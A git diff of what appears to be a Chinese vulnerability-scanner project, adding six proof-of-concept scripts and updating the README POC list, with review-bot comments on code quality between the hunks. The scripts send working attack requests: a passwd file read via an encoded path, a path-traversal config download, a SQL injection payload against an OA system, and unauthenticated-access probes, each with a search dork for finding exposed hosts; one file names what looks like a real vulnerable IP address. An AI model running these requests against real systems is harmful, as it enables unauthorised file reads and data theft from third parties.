diff --git a/README.md b/README.md index 6c54ea1..8c8b7ab 100644 --- a/README.md +++ b/README.md @@ -10,14 +10,14 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-180-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ## 🦌 简介 -1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC; +1、POC数量、经过麒麟实验室小伙伴们的不懈努力现已有180个POC; 2、使用python编写、跨平台、并发能力强、扫描速度非常快; @@ -202,6 +202,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| ||MAC1200R电信定制版默认弱口令|``poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py``| |中国移动|中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞|``poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py``| +|Combodo iTop|Combodo iTop信息泄露漏洞|``poc/Combodo_ITop/Info_Disclosure/poc.py``| |common(通用)|git信息泄露|``poc/common/Git_Info_Disclosure/poc.py``| ||svn信息泄露|``poc/common/Svn_Info_Disclosure/poc.py``| ||URL存活检测|``poc/common/Url_Alive/poc.py``| 
@@ -245,14 +246,18 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |海康威视|HIKVISION 视频编码设备接入网关 任意文件下载|``poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py``|
 ||HIKVISION 流媒体管理服务器弱口令|``poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py``|
 ||HIKVISION 流媒体管理服务器任意文件读取|``poc/HIKVISION/File_Read_Stream_Media_Manager/poc.py``|
+|宏景|宏景人力资源信息管理系统 文件读取漏洞|``poc/HJ_宏景/File_Read/poc.py``|
 |宏电|宏电 H8922 后台任意文件读取漏洞|``poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py``|
 |好视通|好视通视频会议平台 任意文件下载|``poc/HST_好视通/File_Download/poc.py``|
+||好视通视频会议平台 任意文件读取|``poc/HST_好视通/File_Read/poc.py``|
 |华为|Huawei HG659 lib 任意文件读取漏洞|``poc/Huawei/File_Read_HG659_lib/poc.py``|
+|华天OA|华天动力OA sql注入漏洞|``poc/HT_华天OA/Sqli_ApiController/poc.py``|
 |Wayos AC|集中管理系统默认弱口令|``poc/WayosAC/poc.py``|
 |汇文|汇文OPAC敏感信息泄露|``poc/HuiWen_汇文/Info_Disclosure/poc.py``|
 ||汇文OPAC弱口令|``poc/HuiWen_汇文/Weak_Pass/poc.py``|
 |蜂网互联|蜂网互联 企业级路由器v4.31 密码泄露漏洞|``poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py``|
 |Intelbras|Intelbras Wireless 未授权与密码泄露|``poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/poc.py``|
+|佳能打印机|IRADVC3325 佳能打印机未授权访问漏洞|``poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py``|
 |Jboss|Jboss未授权访问|``poc/Jboss/Unauth_Access/poc.py``|
 |Jellyfin|Jellyfin任意文件读取|``poc/jellyfin/File_Read_CVE_2021_21402/poc.py``|
 ||Jellyfin RemoteImageController.cs SSRF漏洞(CVE-2021-29490)|``poc/jellyfin/SSRF_CVE_2021_29490/poc.py``|
@@ -273,12 +278,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 ||Lanproxy弱口令漏洞|``poc/Lanproxy/Weak_Pass/poc.py``|
 |朗驰欣创|朗驰欣创视频监控系统 FTP账号密码泄露|``poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/poc.py``|
 |利谱第二代防火墙|利谱第二代防火墙存在信息泄露漏洞|``poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py``|
+|龙软科技|龙软科技 全员考试系统信息泄露|``poc/LR_龙软科技/Info_Disclosure/poc.py``|
 |佑友|佑友防火墙 弱口令|``poc/MailGard_佑友/Weak_Pass_FireWall/poc.py``|
 ||佑友防火墙 后台命令执行漏洞|``poc/MailGard_佑友/RCE_ping_FireWall/poc.py``|
 |迈普 ISG1000安全网关|迈普 ISG1000安全网关 任意文件下载漏洞|``poc/MaiPu_迈普/File_Download_webui/poc.py``|
 |MC573|MC573未授权访问|``poc/MC573/UnAuth_MC573/poc.py``|
 |MessageSolution企业邮件归档管理系统|MessageSolution企业邮件归档管理系统 EEA 信息泄露|``poc/MessageSolution/Info_Disclosure/poc.py``|
 |MetaBase|MetaBase任意文件读取漏洞 CVE-2021-41277|``poc/Metabase/File_Read_CVE_2021_41277/poc.py``|
+|木云科技|资源统一管理平台未授权访问漏洞|``poc/MY_木云科技/Unauth_Access/poc.py``|
 |蓝海卓越|蓝海卓越计费管理系统 任意文件读取|``poc/NatShell_蓝海卓越/File_Read/poc.py``|
 ||蓝海卓越计费管理系统 认证hash泄露|``poc/NatShell_蓝海卓越/HashInfo_DisClosure/poc.py``|
 |中科网威|中科网威 下一代防火墙控制系统 账号密码泄露漏洞|``poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py``|
diff --git a/poc/HJ_宏景/File_Read/poc.py b/poc/HJ_宏景/File_Read/poc.py
new file mode 100644
index 0000000..edf2f04
--- /dev/null
+++ b/poc/HJ_宏景/File_Read/poc.py
@@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-17", # POC创建时间 + "UpdateDate" : "2022-10-17", # POC创建时间 + "PocDesc" : """ + 通过该POC可以下载passwd文件造成信息泄露漏洞。 + POC为:URL+/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京宏景世纪软件股份有限公司人力与人才信息管理系统文件读取漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1017", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-17", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="人力资源信息管理系统" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root:/root" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() 
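Review bot: The `try`/`except Exception as e: raise e` around the `requests.get` call in `_verify` handles nothing — it only re-raises with an extra traceback frame — so either drop the wrapper or, if the structure is kept for a future handler, narrow it to `except requests.RequestException: raise`. `if self._honeypot_check(vuln[1]) == True:` should read `if self._honeypot_check(vuln[1]):`, and `url_handle` is imported but never used. The same three items repeat in the HST_好视通, HT_华天OA, IRADVC3325, LR_龙软科技 and MY_木云科技 `poc.py` hunks of this commit. The `_verify` docstring promises `不存在漏洞:vuln = [False,""]`, but the code returns `[False,req.text]` on a miss and `_honeypot_check` can flip `vuln[0]` while leaving the body in place, so the docstring should say `不存在漏洞:vuln = [False,html_source]`. The `"UpdateDate"` entry carries the comment `# POC创建时间`, copied from the line above; it should be `# POC更新时间` (same copy-paste in the other five files).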
diff --git a/poc/HST_好视通/File_Read/poc.py b/poc/HST_好视通/File_Read/poc.py new file mode 100644 index 0000000..6c63761 --- /dev/null +++ b/poc/HST_好视通/File_Read/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-09-20", # POC创建时间 + "UpdateDate" : "2022-09-20", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "好视通视频平台 任意文件读取", # 漏洞名称 + "VulnID" : "oFx-2022-0003", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "好视通视频会议平台", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-09-20", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="好视通-视频会议" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/HT_华天OA/Sqli_ApiController/poc.py b/poc/HT_华天OA/Sqli_ApiController/poc.py new file mode 100644 index 0000000..bb247e3 --- /dev/null 
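Review bot: The condition `if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 :` never compares `"fastmeeting"` with the response — a non-empty string literal is always truthy — so the check silently reduces to `"live_ice.cfg" in req.text`; write `if req.status_code == 200 and "fastmeeting" in req.text and "live_ice.cfg" in req.text:`. The IRADVC3325 `poc.py` hunk has the same defect in `"设备名称 :" and "C3325 (QTS24430)" in req.text`, where the first literal is likewise never tested. The `fileName` value on the `url = self.target + ...` line contains `\.` and `\F`, which are invalid escape sequences in a normal string (a DeprecationWarning today, a SyntaxWarning from 3.12); make it a raw string `r"..."` so the literal is explicit and warning-free. `"PocDesc"` is the single word `略`, which documents nothing; one line saying what the endpoint returns and why `live_ice.cfg` identifies it would let a maintainer re-verify the marker later.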
+++ b/poc/HT_华天OA/Sqli_ApiController/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-11", # POC创建时间 + "UpdateDate" : "2022-10-11", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "华天动力OAsql注入漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1011", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-11", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="华天动力-OA8000" + """, # fofa搜索语句 + "example" : "http://14.29.237.26:88/", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/OAapp/HtClientServlet2" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "command=getChat&receiver='%20or%201=1%20or%20''='" + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers, data = data, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "W3siY29udGVudCI6" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py new file mode 100644 index 0000000..1fc3b16 --- /dev/null +++ b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py 
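Review bot: `"example" : "http://14.29.237.26:88/"` commits what looks like a live third-party host into repository metadata; the other new POCs leave this field empty and the field's own comment only asks for a demonstration URL, so replace it with an empty string or an obviously fictional placeholder rather than publishing someone's address. The success marker `"W3siY29udGVudCI6"` is the base64 encoding of the JSON prefix `[{"content":`, which is not apparent from the line; add `# base64 of '[{"content":' — the endpoint answers with base64-encoded JSON` beside the condition so the check stays maintainable. `"PocDesc"` and `"VulnDesc"` are both empty, so nothing in the file says what `HtClientServlet2` is or what a decoded `getChat` response proves; the IRADVC3325, LR_龙软科技 and MY_木云科技 hunks have the same empty fields.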
@@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "佳能打印机设备存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1027", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-27", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "设备名称 :" and "C3325 (QTS24430)" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/LR_龙软科技/Info_Disclosure/poc.py b/poc/LR_龙软科技/Info_Disclosure/poc.py new file mode 100644 index 0000000..2fdfdc1 --- /dev/null +++ b/poc/LR_龙软科技/Info_Disclosure/poc.py 
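Review bot: `_verify` only fetches `/` and matches the model banner `"C3325 (QTS24430)"`, so a hit means the landing page is reachable and identifies as that model, not that any function is exposed without authentication as `name` claims; add `# fingerprint only: matches the model banner on the root page, does not exercise an unauthenticated function` and treat the result as needing confirmation, or rename the check so it does not claim more than it verifies. The `"fofa-dork"` string is empty while every other new POC in this commit carries one. `"VulnID" : "oFx-2022-1027"` and `"VulnDate" : "2022-10-27"` sit next to `"CreateDate" : "2022-10-24"`; the sibling files derive the ID from the creation date (`oFx-2022-1017` / `2022-10-17`, `oFx-2022-1019` / `2022-10-19`, `oFx-2022-1024` / `2022-10-24`), so if that convention is intended one of these values is inconsistent.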
@@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-19", # POC创建时间 + "UpdateDate" : "2022-10-19", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京龙软科技股份有限公司全员考试系统信息泄露", # 漏洞名称 + "VulnID" : "oFx-2022-1019", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-19", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="-743571358" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/files/temp/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "/files/temp/" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/MY_木云科技/Unauth_Access/poc.py b/poc/MY_木云科技/Unauth_Access/poc.py new file mode 100644 index 0000000..bd5acff --- /dev/null +++ b/poc/MY_木云科技/Unauth_Access/poc.py 
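Review bot: The success test `if "/files/temp/" in req.text:` matches the very path that was requested, and the status-code condition beside it is commented out (`#req.status_code == 200 and :`), so any server whose error page echoes the requested URL — a common 404 layout — is reported as vulnerable. Restore `req.status_code == 200 and` and match something a directory listing emits that an error page does not (its heading, to be confirmed against a real response) instead of the request path. The HJ_宏景 hunk carries the same commented-out status check, though its `"root:/root"` marker is less likely to be echoed by an error page.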
@@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "木云科技资源统一管理平台存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1024", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + title="资源统一管理平台" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/logger/siteSituational/?id=s1&tokenundefined" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "站点分析 - 资源统一管理平台系统" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc deleted file mode 100644 index 0c45933..0000000 Binary files a/poc/common/Git_Info_Disclosure/poc.pyc and /dev/null differ 
diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc
deleted file mode 100644
index 04401dd..0000000
Binary files a/poc/common/Svn_Info_Disclosure/poc.pyc and /dev/null differ
diff --git a/poc/common/Url_Alive/poc.pyc b/poc/common/Url_Alive/poc.pyc
deleted file mode 100644
index 53d68f5..0000000
Binary files a/poc/common/Url_Alive/poc.pyc and /dev/null differ
diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc
deleted file mode 100644
index fd50364..0000000
Binary files a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc and /dev/null differ
diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc
deleted file mode 100644
index 22d0293..0000000
Binary files a/poc/php/Backdoor_v8dev/poc.pyc and /dev/null differ